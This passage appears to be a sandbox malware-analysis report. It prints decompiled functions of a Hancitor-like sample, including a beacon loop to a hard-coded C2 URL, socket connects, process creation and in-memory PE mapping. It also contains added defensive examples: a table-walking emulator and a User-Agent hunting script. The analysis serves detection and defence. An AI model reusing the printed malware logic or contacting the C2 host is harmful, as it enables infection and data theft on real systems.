                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AdaptersAddressesAllocateDirectoryInformationProcessVolumeWindows
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3351004863-0
                                                                                                                                        • Opcode ID: d44b96bc2648ed391fcc60b98b878f83b12ea3426167ef4789c3e63441c3020f
                                                                                                                                        • Instruction ID: 87ea084e04d181d6e738f5407fda6d38fbcd4e1bed013aff11b5dec1004317e2
                                                                                                                                        • Opcode Fuzzy Hash: d44b96bc2648ed391fcc60b98b878f83b12ea3426167ef4789c3e63441c3020f
                                                                                                                                        • Instruction Fuzzy Hash: 8A414EB4D00208ABEB14DFE5D981BEEF7B5BF48704F10855AE519B7280E770AA84CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.78%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000B362(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                        				void* _t26;
                                                                                                                                        				void* _t32;
                                                                                                                                        				void* _t34;
                                                                                                                                        				void* _t37;
                                                                                                                                        				char* _t43;
                                                                                                                                        				void* _t44;
                                                                                                                                        
                                                                                                                                        				_t41 = __edx;
                                                                                                                                        				_t40 = __ecx;
                                                                                                                                        				_t37 = 0;
                                                                                                                                        				E10003FF3();
                                                                                                                                        				 *((intOrPtr*)(_t44 - 0x14)) = 0;
                                                                                                                                        				_t26 = E10001000(_t44 - 0x14, __ecx, __edx, _t44 - 0x14);
                                                                                                                                        				if( *((intOrPtr*)(_t44 - 0x14)) == 0) {
                                                                                                                                        					_t26 = E10001000(_t44 - 0x14, __ecx, __edx, _t44 - 0x14);
                                                                                                                                        					if( *((intOrPtr*)(_t44 - 0x14)) == 0) {
                                                                                                                                        						_t26 = E10001000(_t44 - 0x14, __ecx, __edx, _t44 - 0x14);
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				if( *((intOrPtr*)(_t44 - 0x14)) == 0) {
                                                                                                                                        					L23:
                                                                                                                                        					E10001026(_t26, _t37, _t40, _t41,  *((intOrPtr*)(_t44 - 0x14)));
                                                                                                                                        					return _t37;
                                                                                                                                        				}
                                                                                                                                        				_t26 = E1000B304(_t44 - 0x10, _t41,  *((intOrPtr*)(_t44 - 0x14)), _t44 - 0x10); // executed
                                                                                                                                        				if(_t26 != 1) {
                                                                                                                                        					goto L23;
                                                                                                                                        				}
                                                                                                                                        				_t43 = "http://overnightfile.com/mlu/forum.php";
                                                                                                                                        				while( *_t43 != 0) {
                                                                                                                                        					_t37 = _t37;
                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                        						 *((intOrPtr*)(_t44 - 0x1c)) = 0xa;
                                                                                                                                        						while(1) {
                                                                                                                                        							 *((intOrPtr*)(_t44 - 0x18)) = 0;
                                                                                                                                        							_t32 = E10003F8F(_t43,  *((intOrPtr*)(_t44 - 0x14)), _t44 - 0x18); // executed
                                                                                                                                        							_t33 = _t32;
                                                                                                                                        							if(_t32 != 0 &&  *((intOrPtr*)(_t44 - 0x18)) != 0) {
                                                                                                                                        								_t37 = _t33;
								if(_t37 == 0) {
									_t34 = E10001B79(_t40, _t41,  *((intOrPtr*)(_t44 - 0x18)));
									_t33 = _t34;
									if(_t34 != 0) {
										_t37 = _t33;
									}
								}
							}
							_t26 = E10001026(_t33, _t37, _t40, _t41,  *((intOrPtr*)(_t44 - 0x18)));
							_t37 = _t37;
							if(_t37 != 0 ||  *((intOrPtr*)(_t44 - 0x1c)) == 0) {
								break;
							}
							 *((intOrPtr*)(_t44 - 0x1c)) =  *((intOrPtr*)(_t44 - 0x1c)) - 1;
							Sleep(0x1388);
						}
						while( *_t43 != 0) {
							_t43 =  &(_t43[1]);
						}
						_t43 =  &(_t43[1]);
						continue;
					}
					break;
				}
				_t37 = _t37;
				if(_t37 != 0) {
					_t26 = E100026B6("Client Hash", _t44 - 0x10, 0x10); // executed
				}
				goto L23;
			}

APIs
• Part of subcall function 10003FF3: WSAStartup.WSOCK32(00000101,?), ref: 10004008
• Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 1000B420
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: SleepStartup
• String ID: Client Hash$http://overnightfile.com/mlu/forum.php
• API String ID: 1372284471-3973395219
• Opcode ID: a7ca72562b2103df3478d186f753745b639680fd847caa769ff02d0a74380b96
• Instruction ID: ec1c494170b3bdf541c5c1bca8b9a19162536f1f75bd8be2548ab85bfa117b48
• Opcode Fuzzy Hash: a7ca72562b2103df3478d186f753745b639680fd847caa769ff02d0a74380b96
• Instruction Fuzzy Hash: 9E212C75D10A4A9AFB01DFE0C882BFEB6B8EB002C4F610035E211A109AD7B95F959752
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 100%
			E1000A942(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, CHAR* _a16, intOrPtr _a20) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t23;
				long _t24;
				void* _t36;

				_t36 = __ecx;
				_t23 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t24 = _t23;
				if(_t24 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E10001E05(E10001E05(E10001DB1(_a12, "\\"),  &_v2064), _a16);
						E1000A89E(_t36, _a4, _a8, _v2068, _a20);
						E10001871(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t24;
			}

APIs
• RegOpenKeyA.ADVAPI32(?,?,?), ref: 1000A955
• RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A989
• RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A9E6
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID:
• API String ID: 1332880857-0
• Opcode ID: bbcac006ee9b77f9a3eb43a3cf1abb72e523c1938f8e660535b5ed4e1fc8cfce
• Instruction ID: 7deeaf799962a3a313d9e1532e5d966a8d03a1267d08ef4192bfa8d41fecf357
• Opcode Fuzzy Hash: bbcac006ee9b77f9a3eb43a3cf1abb72e523c1938f8e660535b5ed4e1fc8cfce
• Instruction Fuzzy Hash: 1F11007590010DBAEF12DF90CC42FDE7BB9FF05380F1081A1B91465066DB75AB91AF91
Uniqueness

Uniqueness Score: 0.03%

C-Code - Quality: 71%
			E1000391D(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, short _a12) {
				intOrPtr _v16;
				short _v18;
				char _v20;
				void* _t15;
				intOrPtr _t16;
				char* _t17;
				void* _t19;

				_t19 = 0;
				_push(6);
				_push(1);
				_push(2); // executed
				L1000B8DE(); // executed
				if(__eax != 0xffffffff) {
					_t19 = __eax;
					_t15 = E1000189F( &_v20, 0x10);
					_v20 = 2;
					_v18 = _a12;
					if(_a8 == 0) {
						if(_a8 != 0 || _a4 != 0) {
							_t16 = E100038E3(_t15, _a4); // executed
							if(_t16 != 0xffffffff) {
								goto L9;
							} else {
								goto L10;
							}
						} else {
							goto L10;
						}
					} else {
						_t16 = _a8;
						L9:
						_v16 = _t16;
						_push(0x10);
						_t17 =  &_v20;
						_push(_t17);
						_push(_t19); // executed
						L1000B8E4(); // executed
						if(_t17 == 0xffffffff) {
							L10:
							_push(_t19);
							L1000B8EA();
							_t19 = 0;
						}
					}
				} else {
				}
				return _t19;
			}

APIs
• socket.WSOCK32(00000002,00000001,00000006), ref: 1000392C
• connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003988
• closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003993
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: closesocketconnectsocket
• String ID:
• API String ID: 643388700-0
• Opcode ID: 36a11a7321d524c3013cd1d88f6809580a537e2414aabcfffacbf84bcdf217f7
• Instruction ID: 0fe64a1404b7cda7f6d95459f92f656de840ddd7733fe327a0aa6c96d15c6893
• Opcode Fuzzy Hash: 36a11a7321d524c3013cd1d88f6809580a537e2414aabcfffacbf84bcdf217f7
• Instruction Fuzzy Hash: 56015630904309AAFB11DFA48C86B9F739CEB003F4F10DA1AF575951D9D7F499449711
Uniqueness
Uniqueness Score: 0.09%

C-Code - Quality: 100%
E1000A89E(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, intOrPtr _a16) {
	void* _v8;
	int _v12;
	int _v16;
	char _v2064;
	intOrPtr _v2068;
	long _t22;
	long _t23;
	void* _t34;

	_t34 = __ecx;
	_t22 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
	_t23 = _t22;
	if(_t23 == 0) {
		_v12 = 0;
		while(1) {
			_v16 = 0x7ff;
			if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
				break;
			}
			_v2068 = E10001E05(E10001DB1(_a12, "\\"),  &_v2064);
			E1000A709(_t34, _a4, _a8, _v2068, _a16);
			E10001871(_v2068);
			_v12 = _v12 + 1;
		}
		return RegCloseKey(_v8);
	}
	return _t23;
}

APIs
• RegOpenKeyA.ADVAPI32(?,?,?), ref: 1000A8B1
• RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A8E5
• RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A939
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID:
• API String ID: 1332880857-0
• Opcode ID: 0f85eeccc54245a9827ff4c3cc96af946dd8fa5877d7234fea3b38c3c0280e68
• Instruction ID: f47b53803592f8f4f6a176bf7fb9741ab81eb69629b35a8a2d74928b383861f2
• Opcode Fuzzy Hash: 0f85eeccc54245a9827ff4c3cc96af946dd8fa5877d7234fea3b38c3c0280e68
• Instruction Fuzzy Hash: A2110C7690010DBAEF11DF90CC42FDD7BB9FF04380F1081A1B514641AAEB75AB91AF91
Uniqueness
Uniqueness Score: 0.03%

C-Code - Quality: 100%
E02443940(CHAR* _a4) {
	struct _PROCESS_INFORMATION _v20;
	struct _STARTUPINFOA _v88;
	int _t11;

	_v88.cb = 0x44;
	E024414A0( &(_v88.lpReserved), 0, 0x40);
	_t11 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
	if(_t11 != 0) {
		CloseHandle(_v20);
		CloseHandle(_v20.hThread);
		return 1;
	}
	return 0;
}

APIs
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID:
• API String ID: 2922976086-0
• Opcode ID: 3849761fdbcb4bf66fe5e70596c4861ec4a88348931424e499f1cceec48b8882
• Instruction ID: fefe16fa39135a7368fb2fcd0c7569ec2f6580f3a66a805b1f50ebd81d3eb624
• Opcode Fuzzy Hash: 3849761fdbcb4bf66fe5e70596c4861ec4a88348931424e499f1cceec48b8882
• Instruction Fuzzy Hash: B9F0F4B6E40208ABE714DFE0DC45FBF7778AB44704F004959FA099B284DB75A558CB91
Uniqueness
Uniqueness Score: 0.62%

C-Code - Quality: 100%
E02443C10(void* __ecx, CHAR* _a4, void* _a8, long _a12) {
	void* _v8;
	void* _t13;

	if(_a8 == 0 || _a12 == 0) {
		L4:
		return 0;
	} else {
		_t13 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
		_v8 = _t13;
		if(_v8 == 0xffffffff) {
			goto L4;
		}
		WriteFile(_v8, _a8, _a12,  &_a12, 0); // executed
		CloseHandle(_v8);
		return 1;
	}
}
APIs
• CreateFileA.KERNEL32(02442789,40000000,00000000,00000000,00000002,00000080,00000000,02442789), ref: 02443C36
• WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02443C57
• CloseHandle.KERNEL32(000000FF), ref: 02443C61
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID:
• API String ID: 1065093856-0
• Opcode ID: 2bd8832b86edef919e5385fef945bba75025f5cb3711ef797673e653389f34a6
• Instruction ID: 9cd638e92936c4939fa95dbc1038a13933e94c824fe8c951f8f315dd0803b9f6
• Opcode Fuzzy Hash: 2bd8832b86edef919e5385fef945bba75025f5cb3711ef797673e653389f34a6
• Instruction Fuzzy Hash: 09F04475640308FBE714CFA8CD49F9E77B8AB08B14F208649BA14962C0DB70AA90CB50
Uniqueness

Uniqueness Score: 0.04%

C-Code - Quality: 83%
E10003F8F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
	void* _v8;
	intOrPtr _v12;
	void* __ebx;
	void* _t18;
	void* _t19;
	void* _t20;

	_t19 = 0;
	if(_a8 != 0 && _a12 != 0) {
		_t14 =  &_v8;
		_push(_t14);
		_push(_a8);
		L1000BA64();
		if(_t14 >= 0) {
			_v12 = E10001091(_t14, 0, _t20, _a8);
			_t14 = GlobalLock(_v8);
			if(GlobalLock(_v8) != 0) {
				_t18 = E10003F35(_t20, _a4, _t14, _v12, _a12); // executed
				_t19 = _t18;
				_t14 = GlobalUnlock(_v8);
			}
		}
		E100012C2(_t14, _t20, _a8);
	}
	return _t19;
}
APIs
• GetHGlobalFromStream.OLE32(00000000,?), ref: 10003FAB
• GlobalLock.KERNEL32 ref: 10003FC2
• GlobalUnlock.KERNEL32(?,?,00000000,00000000,?), ref: 10003FDF
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: Global$FromLockStreamUnlock
• String ID:
• API String ID: 2287449323-0
• Opcode ID: 80c2ff928e601c4828d72f96b8c946af4fda8ed620e808753be0437ec2a1e452
• Instruction ID: 5d5a65e50073825c305d2d03fb178da110e8bd86d415743e381340723fdabe95
• Opcode Fuzzy Hash: 80c2ff928e601c4828d72f96b8c946af4fda8ed620e808753be0437ec2a1e452
• Instruction Fuzzy Hash: 29F0FF35900209BBEF02DFA0CC41EAE7BB9EF00294F108135B91495076DB72DF60DA50
Uniqueness

Uniqueness Score: 0.64%

C-Code - Quality: 84%
E024433F0(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16) {
	void* _v8;
	void* _v12;
	intOrPtr _v16;
	long _v20;
	void* _v24;
	void* _v28;
	void* _t46;
	void* _t48;
	void* _t72;

	_v16 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
	_v12 =  *((intOrPtr*)(_v16 + 0x34));
	_v20 =  *((intOrPtr*)(_v16 + 0x50));
	_v8 = 0;
	_v24 = 0;
	while(1) {
		_t46 = VirtualAlloc(_v12, _v20, 0x3000, 0x40); // executed
		_v8 = _t46;
		if(_v8 == 0) {
			_v8 = VirtualAlloc(0, _v20, 0x3000, 0x40);
			_v12 = _v8;
		}
		if(_v8 == 0) {
			break;
		}
		_v28 = 0;
		_t48 = E02443B40(_a4, _a8, _v8, _v12);
		_t72 = _t72 + 0x10;
		_v28 = _t48;
		if(_v28 != 1) {
			L13:
			if(_v8 != 0 && _v24 == 0) {
				VirtualFree(_v8, _v20, 0x8000);
			}
			return _v24;
		}
		if(_a12 != 0) {
			 *_a12 = _v12;
		}
		if(_a16 != 0) {
			 *_a16 = _v12 +  *((intOrPtr*)(_v16 + 0x28));
		}
		_v24 = 1;
		if(0 != 0) {
			continue;
		} else {
			goto L13;
		}
	}
	goto L13;
}
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000001,00000000,00003000,00000040), ref: 02443431
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0244344D
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024434DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Alloc$Free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3668210933-0
                                                                                                                                        • Opcode ID: feee90ea45a8a4d1dc21892c39a50fe3f34ac5236b97474124b8aafbe1b0fa71
                                                                                                                                        • Instruction ID: 686d17ee499e5147e1e51d7669c9f6be59e96d8f9646b670519eab94c5eb4113
                                                                                                                                        • Opcode Fuzzy Hash: feee90ea45a8a4d1dc21892c39a50fe3f34ac5236b97474124b8aafbe1b0fa71
                                                                                                                                        • Instruction Fuzzy Hash: EF311774D00209EFEB15CF94C545BEEBBB4FB48704F60858AEA05A7380C774AA81CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.41%

C-Code - Quality: 68%
			E10001E6A(void* __eflags, signed int _a4) {
				intOrPtr _v8;
				void* _t12;
				intOrPtr _t19;
				intOrPtr* _t20;
				intOrPtr* _t21;

				// _a4 is a CSIDL value. Allocate 0x105 bytes (MAX_PATH + 1) for the path; E10001888 wraps LocalAlloc (see APIs).
				_v8 = E10001888(0x105);
				// 0x1000f536 holds the SHGetFolderPathA pointer resolved at run time (APIs: ref 10001E95).
				if( *0x1000f536 != 0) {
					_t12 =  *0x1000f536(0, _a4, 0, 0, _v8); // executed: SHGetFolderPathA(NULL, csidl, NULL, 0, buffer)
					if(_t12 < 0) {
						goto L3; // failed HRESULT: fall back to the registry
					}
				} else {
					L3:
					E10001871(_v8); // release the buffer; the registry path below allocates its own
					_v8 = 0;
					// 0x1000f53a: NULL-terminated array of pointers to {root key, CSIDL, value name} entries.
					_t21 = 0x1000f53a;
					while( *_t21 != 0) {
						_t20 =  *_t21;
						// 0xffff7fff clears CSIDL_FLAG_CREATE (0x8000) before comparing against the table entry.
						if( *((intOrPtr*)( *_t21 + 4)) != (_a4 & 0xffff7fff)) {
							L7:
							_t21 = _t21 + 4;
							continue;
						} else {
							// Read the folder path from <root key>\Software\...\Explorer\Shell Folders\<value name>.
							_t19 = E10001D2A( *_t20, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", _t20 + 8, 0);
							if(_t19 == 0) {
								goto L7; // value missing: keep scanning the table
							} else {
								_v8 = _t19;
							}
						}
						goto L9;
					}
				}
				L9:
				return _v8; // path string, or NULL if neither route produced one
			}

Instruction addresses of the decompiled lines: 0x10001e7b 0x10001e85 0x10001e95 0x10001e9d 0x00000000 0x00000000 0x10001e87 0x10001e9f 0x10001ea2 0x10001ea7 0x10001eae 0x10001ee2 0x10001eb5 0x10001ec2 0x10001edf 0x10001edf 0x00000000 0x10001ec4 0x10001ed6 0x10001ed8 0x00000000 0x10001eda 0x10001eda 0x10001eda 0x10001ed8 0x00000000 0x10001ec2 0x10001ee2 0x10001ee7 0x10001eec

APIs
  • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
• SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 10001E95
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 10001ECA
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: AllocFolderLocalPath
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 1254228173-2036018995
• Opcode ID: 3366412ca225dd87371a9b2d3f366c3ecca2e8fba8b001ed5588c2d515f4ed2f
• Instruction ID: 5b3514682ffdf82955c538daec004618cab2bab663efea2d3b3cf74ace447c0f
• Opcode Fuzzy Hash: 3366412ca225dd87371a9b2d3f366c3ecca2e8fba8b001ed5588c2d515f4ed2f
• Instruction Fuzzy Hash: B0018435900289FBFB10CF54DC05BDDB7E5EB403D0F214229EA119A198DB719F41EB90
Uniqueness
                                                                                                                                        Uniqueness Score: 0.06%
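Added example, not from the report or from the sample: a pure-Python emulation of the folder-resolution routine above, for an analyst who wants to pull the folder table out of a dump and check which CSIDLs the code can resolve. The entry layout (root key at +0, CSIDL at +4, inline value name at +8, NULL-terminated pointer array) is inferred from the decompile, not stated by the report; the image bytes, base address and registry contents are constructed here, and the CSIDL numbers and "Shell Folders" value names are the documented Windows ones.

```python
import struct

CSIDL_FLAG_CREATE = 0x8000  # the bit that `_a4 & 0xffff7fff` clears
HKEY_CURRENT_USER = 0x80000001
SHELL_FOLDERS_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"

# Constructed table entries: (root key, CSIDL, value name under "Shell Folders").
SAMPLE_ENTRIES = [
    (HKEY_CURRENT_USER, 0x05, "Personal"),       # CSIDL_PERSONAL
    (HKEY_CURRENT_USER, 0x1A, "AppData"),        # CSIDL_APPDATA
    (HKEY_CURRENT_USER, 0x1C, "Local AppData"),  # CSIDL_LOCAL_APPDATA
]


def build_image(base, entries):
    """Constructed mini-dump: packed entries first, then the NULL-terminated pointer array.

    Entry layout (inferred from the decompile): DWORD root_key, DWORD csidl, inline ASCIIZ name.
    Returns (image bytes, virtual address of the pointer array).
    """
    blob = bytearray()
    ptrs = []
    for root, csidl, name in entries:
        ptrs.append(base + len(blob))
        blob += struct.pack("<II", root, csidl) + name.encode("ascii") + b"\0"
        while len(blob) % 4:  # keep the next entry DWORD-aligned
            blob += b"\0"
    table_addr = base + len(blob)
    for p in ptrs:
        blob += struct.pack("<I", p)
    blob += struct.pack("<I", 0)  # terminator, matching `while (*_t21 != 0)`
    return bytes(blob), table_addr


def walk_table(image, base, table_addr):
    """Walk the pointer array the way the loop in E10001E6A does and decode each entry."""
    entries = []
    off = table_addr - base
    while True:
        (ptr,) = struct.unpack_from("<I", image, off)
        if ptr == 0:
            break
        eoff = ptr - base
        root, csidl = struct.unpack_from("<II", image, eoff)
        end = image.index(b"\0", eoff + 8)
        entries.append((root, csidl, image[eoff + 8:end].decode("ascii")))
        off += 4
    return entries


def resolve_folder(csidl, entries, shgetfolderpath=None, shell_folders=None):
    """Mirror the control flow of E10001E6A.

    shgetfolderpath: callable csidl -> path or None (None models a failed HRESULT; passing
    no callable models the unresolved import). shell_folders: dict keyed by
    (root, key, value name) standing in for the registry. Returns the path or None.
    """
    if shgetfolderpath is not None:
        path = shgetfolderpath(csidl)
        if path is not None:
            return path
    wanted = csidl & ~CSIDL_FLAG_CREATE  # same as `& 0xffff7fff` for 32-bit values
    for root, entry_csidl, name in entries:
        if entry_csidl != wanted:
            continue
        path = (shell_folders or {}).get((root, SHELL_FOLDERS_KEY, name))
        if path:
            return path  # first matching entry whose value exists wins
        # value missing: keep scanning, like `goto L7`
    return None


if __name__ == "__main__":
    base = 0x1000F000  # constructed; the real table sits at 0x1000f53a in the dump
    image, table = build_image(base, SAMPLE_ENTRIES)
    print(walk_table(image, base, table))
```

Swapping build_image for a slice of the real dump (read at 0x1000f53a with the dump's base) gives the sample's own table; the mask on the CSIDL is what lets a caller pass CSIDL_FLAG_CREATE through SHGetFolderPathA yet still hit the registry fallback.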

C-Code - Quality: 100%
			E02441EA0() {
				void* _t1;
				void* _t2;

				// Lazily create one WinINet session handle and cache it in the global at 0x24473f0.
				if( *0x24473f0 == 0) {
					// Hard-coded User-Agent; it matches what 64-bit Internet Explorer 11 on Windows 7 sends, so the traffic blends in at a proxy.
					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed: dwAccessType 0 = INTERNET_OPEN_TYPE_PRECONFIG, no proxy, no flags
					 *0x24473f0 = _t2;
				}
				_t1 =  *0x24473f0; // 0xcc0004, the HINTERNET seen in the dump
				return _t1;
			}

Instruction addresses of the decompiled lines: 0x02441eaa 0x02441eb9 0x02441ebf 0x02441ebf 0x02441ec4 0x02441eca

APIs
• InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 02441EB9
Strings
• Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 02441EB4
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: InternetOpen
• String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
• API String ID: 2038078732-3333256863
• Opcode ID: 550043fa8a768d4c3ac6cfaf79ee279d4492b42e2e9365d4aabddbf0c18f0883
• Instruction ID: daa2a0b55599b9d45810afcb1760f776a37504ced492b86375e1a928ab78e977
• Opcode Fuzzy Hash: 550043fa8a768d4c3ac6cfaf79ee279d4492b42e2e9365d4aabddbf0c18f0883
• Instruction Fuzzy Hash: 74D0C938EC0309ABF3248F48AC06F5177D4E304B49F200812FB09652C0D7E07471CA88
Uniqueness
                                                                                                                                        Uniqueness Score: 6.84%
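Added example, not part of the report: a small hunting script over constructed proxy-style events. Because the User-Agent above is a genuine 64-bit IE11 on Windows 7 string, matching it alone is a weak indicator; the signal in this report is a browser User-Agent from a process that is not a browser (the dump came from svchost.exe, and the signature list flags a system process connecting to the network). The `key=value` event format, the process allowlist, the PowerShell User-Agent and the TEST-NET addresses are assumptions made for the example.

```python
import re
import shlex

# Exact User-Agent passed to InternetOpenA in E02441EA0.
HANCITOR_UA = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

# Processes expected to send a browser User-Agent (assumed allowlist; tune per estate).
BROWSER_PROCS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}

# Any UA claiming to be a Mozilla-compatible browser.
BROWSER_UA_RE = re.compile(r"^Mozilla/5\.0 \(")

# Constructed events in an assumed `key=value` format (process, pid, destination, User-Agent).
SAMPLE_EVENTS = [
    'proc=svchost.exe pid=1234 dst=203.0.113.10:80 ua="Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"',
    'proc=iexplore.exe pid=2001 dst=203.0.113.10:80 ua="Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"',
    'proc=svchost.exe pid=1234 dst=203.0.113.11:443 ua="Microsoft-CryptoAPI/6.1"',
    'proc=powershell.exe pid=3000 dst=203.0.113.12:80 ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) WindowsPowerShell/5.1"',
]


def parse_event(line):
    """Split one `key=value` event line into a dict; shlex keeps quoted values intact."""
    return dict(tok.split("=", 1) for tok in shlex.split(line))


def classify(event):
    """Return a severity for one event, or None if it looks benign."""
    proc = event.get("proc", "").lower()
    ua = event.get("ua", "")
    if proc in BROWSER_PROCS:
        return None  # a browser sending a browser UA is expected
    if ua == HANCITOR_UA:
        return "high"  # the exact hard-coded UA from a non-browser process
    if BROWSER_UA_RE.match(ua):
        return "medium"  # some other browser UA from a non-browser process
    return None


def hunt(lines):
    """Run classify over event lines; returns (severity, proc, pid, dst) for each hit."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        sev = classify(ev)
        if sev is not None:
            findings.append((sev, ev["proc"], ev["pid"], ev["dst"]))
    return findings


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The exact-string match is kept because it is cheap and this sample never varies it (the handle is created once and cached), but the medium-severity branch is the one that survives a change of User-Agent in the next build.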

C-Code - Quality: 37%
			E10003D1A(intOrPtr _a4) {
				short _v6;
				char _v8;
				char* _t5;

				// _v8 and _v6 together form a 4-byte struct linger { u_short l_onoff; u_short l_linger; }.
				_v8 = 1;    // l_onoff = 1: linger on close
